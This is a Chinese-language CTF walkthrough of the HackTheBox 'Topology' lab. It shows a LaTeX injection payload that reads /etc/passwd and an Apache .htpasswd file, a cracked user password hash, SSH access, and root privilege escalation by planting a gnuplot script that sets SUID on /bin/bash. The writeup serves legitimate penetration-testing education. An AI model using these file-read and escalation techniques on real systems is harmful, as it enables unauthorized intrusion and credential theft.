基本信息
- https://app.hackthebox.com/machines/Topology
- 10.10.11.217
data:image/s3,"s3://crabby-images/34aa2/34aa25f903bd52f94c40486e48e0e46faac9d592" alt=""
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.11.217 |
80
直接访问是一个小组主页,邮箱和页面链接得到域名:
data:image/s3,"s3://crabby-images/cba2c/cba2cb2defc0ea2cf0b1dfa94ed4d1ea7a098833" alt=""
data:image/s3,"s3://crabby-images/6d8e6/6d8e64566a49cb4a659bc3a2331216162ce6dd5a" alt=""
子域名扫描
得到的域名添加hosts后扫描子域名,得到stats和dev:
1 | 10.10.11.217 topology.htb |
stats
Server 状态:
data:image/s3,"s3://crabby-images/d2b5f/d2b5f60b4cc29e42e9bdfd12e189c52ba901546f" alt=""
dev
需要登录:
data:image/s3,"s3://crabby-images/db06c/db06c0185468533062eff00f3670d63f6c018991" alt=""
latex.topology.htb
是一个在线latex转换器,输入latex输出png图片:
data:image/s3,"s3://crabby-images/01bd5/01bd5387ea853e2c06fbc1fbbabb226746b66957" alt=""
latex injection
latex自身语法功能强大,可以注入其他命令,例如读文件:
- PayloadsAllTheThings/LaTeX Injection at master · swisskyrepo/PayloadsAllTheThings · GitHub
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection - Formula/CSV/Doc/LaTeX Injection - HackTricks
https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#read-file
存在一些过滤,生成的图片提示不合法命令,但简单测试发现到这个的时候响应空白:
1 | \lstinputlisting{/etc/passwd} |
继续搜索latex语法,发现latex使用$
作为分隔符:
- 【LaTeX应用】常用数学公式和符号 - 知乎
https://zhuanlan.zhihu.com/p/464237097
单行文本公式放在
$
与$
之间,或者$$
与$$
之间,例如
1 $ y=x^2 $
所以最终读取文件的payload是:
1 | $\lstinputlisting{/etc/passwd}$ |
data:image/s3,"s3://crabby-images/a920f/a920f52ecaf2279d155caa258c1580780b24d925" alt=""
dev htpasswd
前面dev那里需要登录,结合是apache,那就可以直接读apache的 .htpassd文件:
1 | $\lstinputlisting{/var/www/dev/.htpasswd}$ |
data:image/s3,"s3://crabby-images/fd552/fd55265f75588b48138414754fe9f88360fd5c93" alt=""
得到的图片找个OCR提取出文本
1 | vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0 |
htpasswd crack
然后破解hash,得到vdaisley的密码:
1 | cat hash.txt |
user flag
得到的账号密码ssh登录:
data:image/s3,"s3://crabby-images/765ce/765ced9c989272f2a64d07b944f4080ec5a47cf8" alt=""
提权信息
运行pspy,发现gnuplot:
data:image/s3,"s3://crabby-images/4cfaa/4cfaac92d1cdab4f6f5d3df5499a9645dfb4ca44" alt=""
定时运行对应目录下的任意plt文件,这个目录我们有权限,可以创建要运行的plt文件:
data:image/s3,"s3://crabby-images/2edc4/2edc4f18164d42cf0ba2238c023c4410063c9e34" alt=""
另外gnuplt可以运行shell命令:
那就可以在自定义plt中执行任意命令
提权 & root flag
简单的加suid,等待触发执行:
1 | echo 'system "chmod u+s /bin/bash"' > /opt/gnuplot/miao.plt |
data:image/s3,"s3://crabby-images/0f17f/0f17fc5fe8bc63de41c9cf0653337eb7c6f62625" alt=""
shadow
1 | root:$6$P153wNg6DwlTSIv0$QFutCIjQWlJM24O6vyD5aoRv7kyvivOykonMDItV8rSqKpznqsmxfK7L51il6V7yF75qHE.Hkv6YLK25TSEle1:19496:0:99999:7::: |
参考资料
- PayloadsAllTheThings/LaTeX Injection at master · swisskyrepo/PayloadsAllTheThings · GitHub
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection - Formula/CSV/Doc/LaTeX Injection - HackTricks
https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#read-file - 【LaTeX应用】常用数学公式和符号 - 知乎
https://zhuanlan.zhihu.com/p/464237097 - Shell
http://www.gnuplot.info/docs_4.2/node327.html